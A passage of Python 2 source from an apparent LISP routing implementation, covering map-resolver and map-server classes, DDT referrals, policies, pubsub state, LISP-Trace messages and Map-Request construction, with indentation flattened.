se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None):
se = lisp_site_eid(self.site)
se.eid.copy_address(self.group)
se.group.copy_address(self.group)
lisp_sites_by_eid.add_cache(self.group, se)
#
# See lisp_site_eid_lookup() for special case details for
# longest match looks for (S,G) entries.
#
se.parent_for_more_specifics = self.parent_for_more_specifics
#endif
if (self.eid.is_null()): self.eid.make_default_route(se.group)
se.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.delete_cache(self.eid)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None): return
site_eid = se.lookup_source_cache(self.eid, True)
if (site_eid == None): return
if (se.source_cache == None): return
se.source_cache.delete_cache(self.eid)
if (se.source_cache.cache_size() == 0):
lisp_sites_by_eid.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_se):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_se.eid, source_se)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
def eid_record_matches(self, eid_record):
if (self.eid.is_exact_match(eid_record.eid) == False): return(False)
if (eid_record.group.is_null()): return(True)
return(eid_record.group.is_exact_match(self.group))
#enddef
def inherit_from_ams_parent(self):
parent = self.parent_for_more_specifics
if (parent == None): return
self.force_proxy_reply = parent.force_proxy_reply
self.force_nat_proxy_reply = parent.force_nat_proxy_reply
self.force_ttl = parent.force_ttl
self.pitr_proxy_reply_drop = parent.pitr_proxy_reply_drop
self.proxy_reply_action = parent.proxy_reply_action
self.echo_nonce_capable = parent.echo_nonce_capable
self.policy = parent.policy
self.require_signature = parent.require_signature
self.encrypt_json = parent.encrypt_json
#enddef
def rtrs_in_rloc_set(self):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rtr_in_rloc_set(self, rtr_rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_exact_match(rtr_rloc) == False): continue
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rloc_in_rloc_set(self, rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle):
for rle in rloc_entry.rle.rle_nodes:
if (rle.address.is_exact_match(rloc)): return(True)
#endif
#endif
if (rloc_entry.rloc.is_exact_match(rloc)): return(True)
#endfor
return(False)
#enddef
def do_rloc_sets_match(self, prev_rloc_set):
if (len(self.registered_rlocs) != len(prev_rloc_set)): return(False)
for rloc_entry in prev_rloc_set:
old_rloc = rloc_entry.rloc
if (self.is_rloc_in_rloc_set(old_rloc) == False): return(False)
#endfor
return(True)
#enddef
#endclass
class lisp_mr():
def __init__(self, addr_str, dns_name, mr_name):
self.mr_name = mr_name if (mr_name != None) else "all"
self.dns_name = dns_name
self.map_resolver = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (addr_str):
self.map_resolver.store_address(addr_str)
self.insert_mr()
else:
self.resolve_dns_name()
#endif
self.last_used = 0
self.last_reply = 0
self.last_nonce = 0
self.map_requests_sent = 0
self.neg_map_replies_received = 0
self.total_rtt = 0
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
# Check if number of A-records have changed and this one is no longer
# valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_mr()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_resolver.print_address_no_iid()):
self.delete_mr()
self.map_resolver.store_address(addr)
self.insert_mr()
#endif
#
# If pull-based decent DNS suffix, then create other lisp_mr() for
# all A-records. Only have master to this (A-record index 0).
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
mr = lisp_get_map_resolver(a, None)
if (mr != None and mr.a_record_index == a_records.index(addr)):
continue
#endif
mr = lisp_mr(addr, None, None)
mr.a_record_index = a_records.index(addr)
mr.dns_name = self.dns_name
mr.last_dns_resolve = lisp_get_timestamp()
#endfor
#
# Check for deletes.
#
delete_list = []
for mr in lisp_map_resolvers_list.values():
if (self.dns_name != mr.dns_name): continue
a = mr.map_resolver.print_address_no_iid()
if (a in a_records): continue
delete_list.append(mr)
#endfor
for mr in delete_list: mr.delete_mr()
#enddef
def insert_mr(self):
key = self.mr_name + self.map_resolver.print_address()
lisp_map_resolvers_list[key] = self
#enddef
def delete_mr(self):
key = self.mr_name + self.map_resolver.print_address()
if (lisp_map_resolvers_list.has_key(key) == False): return
lisp_map_resolvers_list.pop(key)
#enddef
#endclass
class lisp_ddt_root():
def __init__(self):
self.root_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.priority = 0
self.weight = 0
#enddef
#endclass
class lisp_referral():
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_set = {}
self.referral_type = LISP_DDT_ACTION_NULL
self.referral_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_ttl = 0
self.uptime = lisp_get_timestamp()
self.expires = 0
self.source_cache = None
#enddef
def print_referral(self, eid_indent, referral_indent):
uts = lisp_print_elapsed(self.uptime)
ets = lisp_print_future(self.expires)
lprint("{}Referral EID {}, uptime/expires {}/{}, {} referrals:". \
format(eid_indent, green(self.eid.print_prefix(), False), uts,
ets, len(self.referral_set)))
for ref_node in self.referral_set.values():
ref_node.print_ref_node(referral_indent)
#endfor
#enddef
def print_referral_type(self):
if (self.eid.afi == LISP_AFI_ULTIMATE_ROOT): return("root")
if (self.referral_type == LISP_DDT_ACTION_NULL):
return("null-referral")
#endif
if (self.referral_type == LISP_DDT_ACTION_SITE_NOT_FOUND):
return("no-site-action")
#endif
if (self.referral_type > LISP_DDT_ACTION_MAX):
return("invalid-action")
#endif
return(lisp_map_referral_action_string[self.referral_type])
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.referral_ttl
if (ttl < 60): return(str(ttl) + " secs")
if ((ttl % 60) == 0):
ttl = str(ttl/60) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def is_referral_negative(self):
return (self.referral_type in \
(LISP_DDT_ACTION_MS_NOT_REG, LISP_DDT_ACTION_DELEGATION_HOLE,
LISP_DDT_ACTION_NOT_AUTH))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_referral_cache.add_cache(self.eid, self)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None):
ref = lisp_referral()
ref.eid.copy_address(self.group)
ref.group.copy_address(self.group)
lisp_referral_cache.add_cache(self.group, ref)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ref.group)
ref.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_referral_cache.delete_cache(self.eid)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None): return
sref = ref.lookup_source_cache(self.eid, True)
if (sref == None): return
ref.source_cache.delete_cache(self.eid)
if (ref.source_cache.cache_size() == 0):
lisp_referral_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_ref):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ref.eid, source_ref)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
#endclass
class lisp_referral_node():
def __init__(self):
self.referral_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.priority = 0
self.weight = 0
self.updown = True
self.map_requests_sent = 0
self.no_responses = 0
self.uptime = lisp_get_timestamp()
#enddef
def print_ref_node(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}referral {}, uptime {}, {}, priority/weight: {}/{}".format( \
indent, red(self.referral_address.print_address(), False), ts,
"up" if self.updown else "down", self.priority, self.weight))
#enddef
#endclass
class lisp_ms():
def __init__(self, addr_str, dns_name, ms_name, alg_id, key_id, pw, pr,
mr, rr, wmn, site_id, ekey_id, ekey):
self.ms_name = ms_name if (ms_name != None) else "all"
self.dns_name = dns_name
self.map_server = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (lisp_map_servers_list == {}):
self.xtr_id = lisp_get_control_nonce()
else:
self.xtr_id = lisp_map_servers_list.values()[0].xtr_id
#endif
self.alg_id = alg_id
self.key_id = key_id
self.password = pw
self.proxy_reply = pr
self.merge_registrations = mr
self.refresh_registrations = rr
self.want_map_notify = wmn
self.site_id = site_id
self.map_registers_sent = 0
self.map_registers_multicast_sent = 0
self.map_notifies_received = 0
self.map_notify_acks_sent = 0
self.ekey_id = ekey_id
self.ekey = ekey
if (addr_str):
self.map_server.store_address(addr_str)
self.insert_ms()
else:
self.resolve_dns_name()
#endif
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
# Check if number of A-records have changed and this one is no longer
# valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_ms()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_server.print_address_no_iid()):
self.delete_ms()
self.map_server.store_address(addr)
self.insert_ms()
#endif
#
# If pull-based decent DNS suffix, then create other lisp_ms() for
# all A-records. Only have master to this (A-record index 0).
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
ms = lisp_get_map_server(a)
if (ms != None and ms.a_record_index == a_records.index(addr)):
continue
#endif
ms = copy.deepcopy(self)
ms.map_server.store_address(addr)
ms.a_record_index = a_records.index(addr)
ms.last_dns_resolve = lisp_get_timestamp()
ms.insert_ms()
#endfor
#
# Check for deletes.
#
delete_list = []
for ms in lisp_map_servers_list.values():
if (self.dns_name != ms.dns_name): continue
a = ms.map_server.print_address_no_iid()
if (a in a_records): continue
delete_list.append(ms)
#endfor
for ms in delete_list: ms.delete_ms()
#enddef
def insert_ms(self):
key = self.ms_name + self.map_server.print_address()
lisp_map_servers_list[key] = self
#enddef
def delete_ms(self):
key = self.ms_name + self.map_server.print_address()
if (lisp_map_servers_list.has_key(key) == False): return
lisp_map_servers_list.pop(key)
#enddef
#endclass
class lisp_interface():
def __init__(self, device):
self.interface_name = ""
self.device = device
self.instance_id = None
self.bridge_socket = None
self.raw_socket = None
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dynamic_eid_device = None
self.dynamic_eid_timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
self.multi_tenant_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#enddef
def add_interface(self):
lisp_myinterfaces[self.device] = self
#enddef
def get_instance_id(self):
return(self.instance_id)
#enddef
def get_socket(self):
return(self.raw_socket)
#enddef
def get_bridge_socket(self):
return(self.bridge_socket)
#enddef
def does_dynamic_eid_match(self, eid):
if (self.dynamic_eid.is_null()): return(False)
return(eid.is_more_specific(self.dynamic_eid))
#enddef
def set_socket(self, device):
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
s.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
try:
s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, device)
except:
s.close()
s = None
#endtry
self.raw_socket = s
#enddef
def set_bridge_socket(self, device):
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
try:
s = s.bind((device, 0))
self.bridge_socket = s
except:
return
#endtry
#enddef
#endclass
class lisp_datetime():
def __init__(self, datetime_str):
self.datetime_name = datetime_str
self.datetime = None
self.parse_datetime()
#enddef
def valid_datetime(self):
ds = self.datetime_name
if (ds.find(":") == -1): return(False)
if (ds.find("-") == -1): return(False)
year, month, day, time = ds[0:4], ds[5:7], ds[8:10], ds[11::]
if ((year + month + day).isdigit() == False): return(False)
if (month < "01" and month > "12"): return(False)
if (day < "01" and day > "31"): return(False)
hour, mi, sec = time.split(":")
if ((hour + mi + sec).isdigit() == False): return(False)
if (hour < "00" and hour > "23"): return(False)
if (mi < "00" and mi > "59"): return(False)
if (sec < "00" and sec > "59"): return(False)
return(True)
#enddef
def parse_datetime(self):
dt = self.datetime_name
dt = dt.replace("-", "")
dt = dt.replace(":", "")
self.datetime = int(dt)
#enddef
def now(self):
ts = datetime.datetime.now().strftime("%Y-%m-%d-%H:%M:%S")
ts = lisp_datetime(ts)
return(ts)
#enddef
def print_datetime(self):
return(self.datetime_name)
#enddef
def future(self):
return(self.datetime > self.now().datetime)
#enddef
def past(self):
return(self.future() == False)
#enddef
def now_in_range(self, upper):
return(self.past() and upper.future())
#enddef
def this_year(self):
now = str(self.now().datetime)[0:4]
ts = str(self.datetime)[0:4]
return(ts == now)
#enddef
def this_month(self):
now = str(self.now().datetime)[0:6]
ts = str(self.datetime)[0:6]
return(ts == now)
#enddef
def today(self):
now = str(self.now().datetime)[0:8]
ts = str(self.datetime)[0:8]
return(ts == now)
#enddef
#endclass
#
# Policy data structures.
#
class lisp_policy_match():
def __init__(self):
self.source_eid = None
self.dest_eid = None
self.source_rloc = None
self.dest_rloc = None
self.rloc_record_name = None
self.geo_name = None
self.elp_name = None
self.rle_name = None
self.json_name = None
self.datetime_lower = None
self.datetime_upper = None
#endclass
class lisp_policy():
def __init__(self, policy_name):
self.policy_name = policy_name
self.match_clauses = []
self.set_action = None
self.set_record_ttl = None
self.set_source_eid = None
self.set_dest_eid = None
self.set_rloc_address = None
self.set_rloc_record_name = None
self.set_geo_name = None
self.set_elp_name = None
self.set_rle_name = None
self.set_json_name = None
#enddef
def match_policy_map_request(self, mr, srloc):
for m in self.match_clauses:
p = m.source_eid
t = mr.source_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.dest_eid
t = mr.target_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.source_rloc
t = srloc
if (p and t and t.is_more_specific(p) == False): continue
l = m.datetime_lower
u = m.datetime_upper
if (l and u and l.now_in_range(u) == False): continue
return(True)
#endfor
return(False)
#enddef
def set_policy_map_reply(self):
all_none = (self.set_rloc_address == None and
self.set_rloc_record_name == None and self.set_geo_name == None and
self.set_elp_name == None and self.set_rle_name == None)
if (all_none): return(None)
rloc = lisp_rloc()
if (self.set_rloc_address):
rloc.rloc.copy_address(self.set_rloc_address)
addr = rloc.rloc.print_address_no_iid()
lprint("Policy set-rloc-address to {}".format(addr))
#endif
if (self.set_rloc_record_name):
rloc.rloc_name = self.set_rloc_record_name
name = blue(rloc.rloc_name, False)
lprint("Policy set-rloc-record-name to {}".format(name))
#endif
if (self.set_geo_name):
rloc.geo_name = self.set_geo_name
name = rloc.geo_name
not_found = "" if lisp_geo_list.has_key(name) else \
"(not configured)"
lprint("Policy set-geo-name '{}' {}".format(name, not_found))
#endif
if (self.set_elp_name):
rloc.elp_name = self.set_elp_name
name = rloc.elp_name
not_found = "" if lisp_elp_list.has_key(name) else \
"(not configured)"
lprint("Policy set-elp-name '{}' {}".format(name, not_found))
#endif
if (self.set_rle_name):
rloc.rle_name = self.set_rle_name
name = rloc.rle_name
not_found = "" if lisp_rle_list.has_key(name) else \
"(not configured)"
lprint("Policy set-rle-name '{}' {}".format(name, not_found))
#endif
if (self.set_json_name):
rloc.json_name = self.set_json_name
name = rloc.json_name
not_found = "" if lisp_json_list.has_key(name) else \
"(not configured)"
lprint("Policy set-json-name '{}' {}".format(name, not_found))
#endif
return(rloc)
#enddef
def save_policy(self):
lisp_policies[self.policy_name] = self
#enddef
#endclass
class lisp_pubsub():
def __init__(self, itr, port, nonce, ttl, xtr_id):
self.itr = itr
self.port = port
self.nonce = nonce
self.uptime = lisp_get_timestamp()
self.ttl = ttl
self.xtr_id = xtr_id
self.map_notify_count = 0
#enddef
def add(self, eid_prefix):
ttl = self.ttl
eid = eid_prefix.print_prefix()
if (lisp_pubsub_cache.has_key(eid) == False):
lisp_pubsub_cache[eid] = {}
#endif
pubsub = lisp_pubsub_cache[eid]
ar = "Add"
if (pubsub.has_key(self.xtr_id)):
ar = "Replace"
del(pubsub[self.xtr_id])
#endif
pubsub[self.xtr_id] = self
eid = green(eid, False)
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
lprint("{} pubsub state {} for {}, xtr-id: {}, ttl {}".format(ar, eid,
itr, xtr_id, ttl))
#enddef
def delete(self, eid_prefix):
eid = eid_prefix.print_prefix()
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
if (lisp_pubsub_cache.has_key(eid)):
pubsub = lisp_pubsub_cache[eid]
if (pubsub.has_key(self.xtr_id)):
pubsub.pop(self.xtr_id)
lprint("Remove pubsub state {} for {}, xtr-id: {}".format(eid,
itr, xtr_id))
#endif
#endif
#enddef
#endclass
#
# lisp_trace
#
# The LISP-Trace message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=9 | 0 | Local Private Port |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Local Private IPv4 RLOC |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_trace():
def __init__(self):
self.nonce = lisp_get_control_nonce()
self.packet_json = []
self.local_rloc = None
self.local_port = None
self.lisp_socket = None
#enddef
def print_trace(self):
jd = self.packet_json
lprint("LISP-Trace JSON: '{}'".format(jd))
#enddef
def encode(self):
first_long = socket.htonl(0x90000000)
packet = struct.pack("II", first_long, 0)
packet += struct.pack("Q", self.nonce)
packet += json.dumps(self.packet_json)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
if ((first_long & 0xff000000) != 0x90000000): return(False)
if (len(packet) < format_size): return(False)
addr = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
addr = socket.ntohl(addr)
v1 = addr >> 24
v2 = (addr >> 16) & 0xff
v3 = (addr >> 8) & 0xff
v4 = addr & 0xff
self.local_rloc = "{}.{}.{}.{}".format(v1, v2, v3, v4)
self.local_port = str(first_long & 0xffff)
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (len(packet) == 0): return(True)
try:
self.packet_json = json.loads(packet)
except:
return(False)
#entry
return(True)
#enddef
def myeid(self, eid):
return(lisp_is_myeid(eid))
#enddef
def return_to_sender(self, lisp_socket, rts_rloc, packet):
rloc, port = self.rtr_cache_nat_trace_find(rts_rloc)
if (rloc == None):
rloc, port = rts_rloc.split(":")
port = int(port)
lprint("Send LISP-Trace to address {}:{}".format(rloc, port))
else:
lprint("Send LISP-Trace to translated address {}:{}".format(rloc,
port))
#endif
if (lisp_socket == None):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("0.0.0.0", LISP_TRACE_PORT))
s.sendto(packet, (rloc, port))
s.close()
else:
lisp_socket.sendto(packet, (rloc, port))
#endif
#enddef
def packet_length(self):
udp = 8; trace = 4 + 4 + 8
return(udp + trace + len(json.dumps(self.packet_json)))
#enddef
def rtr_cache_nat_trace(self, translated_rloc, translated_port):
key = self.local_rloc + ":" + self.local_port
value = (translated_rloc, translated_port)
lisp_rtr_nat_trace_cache[key] = value
lprint("Cache NAT Trace addresses {} -> {}".format(key, value))
#enddef
def rtr_cache_nat_trace_find(self, local_rloc_and_port):
key = local_rloc_and_port
try: value = lisp_rtr_nat_trace_cache[key]
except: value = (None, None)
return(value)
#enddef
#endclass
#------------------------------------------------------------------------------
#
# lisp_get_map_server
#
# Return a lisp_ms() class instance. Variable 'address' is a lisp_address()
# class instance.
#
def lisp_get_map_server(address):
for ms in lisp_map_servers_list.values():
if (ms.map_server.is_exact_match(address)): return(ms)
#endfor
return(None)
#enddef
#
# lisp_get_any_map_server
#
# Return the first lisp_ms() class instance.
#
def lisp_get_any_map_server():
for ms in lisp_map_servers_list.values(): return(ms)
return(None)
#enddef
#
# lisp_get_map_resolver
#
# Get least recently used Map-Resolver if address is not supplied. Variable
# 'eid' takes on 3 values, an EID value in the form of lisp_address(), None,
# or "". Value "" means to use any MR, like the first one. Value None means
# to use a map-resolver-name that has not been configured (i.e. "all").
#
def lisp_get_map_resolver(address, eid):
if (address != None):
addr = address.print_address()
mr = None
for key in lisp_map_resolvers_list:
if (key.find(addr) == -1): continue
mr = lisp_map_resolvers_list[key]
#endfor
return(mr)
#endif
#
# Get database-mapping entry to find out which map-resolver name set we
# should use, or pick one from a non-configured mr-name list. Or, get the
# first one for info-requests.
#
if (eid == ""):
mr_name = ""
elif (eid == None):
mr_name = "all"
else:
db = lisp_db_for_lookups.lookup_cache(eid, False)
mr_name = "all" if db == None else db.use_mr_name
#endif
older = None
for mr in lisp_map_resolvers_list.values():
if (mr_name == ""): return(mr)
if (mr.mr_name != mr_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
#
# lisp_get_decent_map_resolver
#
# Get the Map-Resolver based on the LISP-Decent pull mapping system lookup
# algorithm
#
def lisp_get_decent_map_resolver(eid):
index = lisp_get_decent_index(eid)
dns_name = str(index) + "." + lisp_decent_dns_suffix
lprint("Use LISP-Decent map-resolver {} for EID {}".format( \
bold(dns_name, False), eid.print_prefix()))
older = None
for mr in lisp_map_resolvers_list.values():
if (dns_name != mr.dns_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
#
# lisp_ipv4_input
#
# Process IPv4 data packet for input checking.
#
def lisp_ipv4_input(packet):
#
# Check IGMP packet first. And don't do IP checksum and don't test TTL.
#
if (ord(packet[9]) == 2): return([True, packet])
#
# Now calculate checksum for verification.
#
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum == 0):
dprint("Packet arrived with checksum of 0!")
else:
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
dprint("IPv4 header checksum failed for inner header")
packet = lisp_format_packet(packet[0:20])
dprint("Packet header: {}".format(packet))
return([False, None])
#endif
#endif
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[8:9])[0]
if (ttl == 0):
dprint("IPv4 packet arrived with ttl 0, packet discarded")
return([False, None])
elif (ttl == 1):
dprint("IPv4 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return([False, None])
#endif
ttl -= 1
packet = packet[0:8] + struct.pack("B", ttl) + packet[9::]
packet = packet[0:10] + struct.pack("H", 0) + packet[12::]
packet = lisp_ip_checksum(packet)
return([False, packet])
#enddef
#
# lisp_ipv6_input
#
# Process IPv6 data packet for input checking.
#
def lisp_ipv6_input(packet):
dest = packet.inner_dest
packet = packet.packet
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[7:8])[0]
if (ttl == 0):
dprint("IPv6 packet arrived with hop-limit 0, packet discarded")
return(None)
elif (ttl == 1):
dprint("IPv6 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return(None)
#endif
#
# Check for IPv6 link-local addresses. They should not go on overlay.
#
if (dest.is_ipv6_link_local()):
dprint("Do not encapsulate IPv6 link-local packets")
return(None)
#endif
ttl -= 1
packet = packet[0:7] + struct.pack("B", ttl) + packet[8::]
return(packet)
#enddef
#
# lisp_mac_input
#
# Process MAC data frame for input checking. All we need to do is get the
# destination MAC address.
#
def lisp_mac_input(packet):
return(packet)
#enddef
#
# lisp_rate_limit_map_request
#
# Check to see if we have sent a data-triggered Map-Request in the last
# LISP_MAP_REQUEST_RATE_LIMIT seconds. Return True if we should not send
# a Map-Request (rate-limit it).
#
def lisp_rate_limit_map_request(dest):
now = lisp_get_timestamp()
#
# Do we have rate-limiting disabled temporarily?
#
elapsed = now - lisp_no_map_request_rate_limit
if (elapsed < LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME):
left = int(LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME - elapsed)
dprint("No Rate-Limit Mode for another {} secs".format(left))
return(False)
#endif
#
# Do we send a Map-Request recently?
#
if (lisp_last_map_request_sent == None): return(False)
elapsed = now - lisp_last_map_request_sent
rate_limit = (elapsed < LISP_MAP_REQUEST_RATE_LIMIT)
if (rate_limit):
dprint("Rate-limiting Map-Request for {}, sent {} secs ago".format( \
green(dest.print_address(), False), round(elapsed, 3)))
#endif
return(rate_limit)
#enddef
#
# lisp_send_map_request
#
# From this process, build and send a Map-Request for supplied EID.
#
def lisp_send_map_request(lisp_sockets, lisp_ephem_port, seid, deid, rloc):
global lisp_last_map_request_sent
#
# Set RLOC-probe parameters if caller wants Map-Request to be an
# RLOC-probe. We use probe_port as 4341 so we the ITR and RTR keying data
# structures can be the same.
#
probe_dest = probe_port = None
if (rloc):
probe_dest = rloc.rloc
probe_port = rloc.translated_port if lisp_i_am_rtr else LISP_DATA_PORT
#endif
#
# If there are no RLOCs found, do not build and send the Map-Request.
#
itr_rloc4, itr_rloc6, device = lisp_myrlocs
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, IPv4 RLOC not found")
return
#endif
if (itr_rloc6 == None and probe_dest != None and probe_dest.is_ipv6()):
lprint("Suppress sending Map-Request, IPv6 RLOC not found")
return
#endif
map_request = lisp_map_request()
map_request.record_count = 1
map_request.nonce = lisp_get_control_nonce()
map_request.rloc_probe = (probe_dest != None)
#
# Hold request nonce so we can match replies from xTRs that have multiple
# RLOCs. Reason being is because source address may not be the probed
# destination. And on our ETR implementation, we can get the probe request
# destination in the lisp-core/lisp-etr/lisp-rtr processes.
#
if (rloc): rloc.last_rloc_probe_nonce = map_request.nonce
sg = deid.is_multicast_address()
if (sg):
map_request.target_eid = seid
map_request.target_group = deid
else:
map_request.target_eid = deid
#endif
#
# If lookup is for an IPv6 EID or there is a signature key configured and
# there is a private key file in current directory, tell lisp_map_request()
# to sign Map-Request. For an RTR, we want to verify its map-request
# signature, so it needs to include its own IPv6 EID that matches the
# private-key file.
#
if (map_request.rloc_probe == False):
db = lisp_get_signature_eid()
if (db):
map_request.signature_eid.copy_address(db.eid)
map_request.privkey_filename = "./lisp-sig.pem"
#endif
#endif
#
# Fill in source-eid field.
#
if (seid == None or sg):
map_request.source_eid.afi = LISP_AFI_NONE
else:
map_request.source_eid = seid
#endif
#
# If ITR-RLOC is a private IPv4 address, we need it to be a global address
# for RLOC-probes.
#
# However, if we are an RTR and have a private address, the RTR is behind
# a NAT. The RLOC-probe is encapsulated with source-port 4341 to get
# through NAT. The ETR receiving the RLOC-probe request must return the
# RLOC-probe reply with same translated address/port pair (the same values
# when it encapsulates data packets).
#
if (probe_dest != None and lisp_nat_traversal and lisp_i_am_rtr == False):
if (probe_dest.is_private_address() == False):
itr_rloc4 = lisp_get_any_translated_rloc()
#endif
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, translated RLOC not found")
return
#endif
#endif
#
# Fill in ITR-RLOCs field. If we don't find an IPv6 address there is
# nothing to store in the ITR-RLOCs list. And we have to use an inner
# source address of 0::0.
#
if (probe_dest == None or probe_dest.is_ipv4()):
if (lisp_nat_traversal and probe_dest == None):
ir = lisp_get_any_translated_rloc()
if (ir != None): itr_rloc4 = ir
#endif
map_request.itr_rlocs.append(itr_rloc4)
#endif
if (probe_dest == None or probe_dest.is_ipv6()):
if (itr_rloc6 == None or itr_rloc6.is_ipv6_link_local()):
itr_rloc6 = None
else:
map_request.itr_rloc_count = 1 if (probe_dest == None) else 0
map_request.itr_rlocs.append(itr_rloc6)
#endif
#endif
#
# Decide what inner source address needs to be for the ECM. We have to
# look at the address-family of the destination EID. If the destination-EID
# is a MAC address, we will use IPv4 in the inner header with a destination
# address of 0.0.0.0.
#
if (probe_dest != None and map_request.itr_rlocs != []):
itr_rloc = map_request.itr_rlocs[0]
else:
if (deid.is_ipv4()):
itr_rloc = itr_rloc4
elif (deid.is_ipv6()):
itr_rloc = itr_rloc6
else:
itr_rloc = itr_rloc4
#endif
#endif
#
# And finally add one EID record. The EID we are looking up.
#
packet = map_request.encode(probe_dest, probe_port)
map_request.print_map_request()
#
# If this is an RLOC-probe, send directly to RLOC and not to mapping
# system. If the RLOC is behind a NAT, we need to data encapsulate it
# from port 4341 to translated destination address and port.
#
if (probe_dest != None):
if (rloc.is_rloc_translated()):
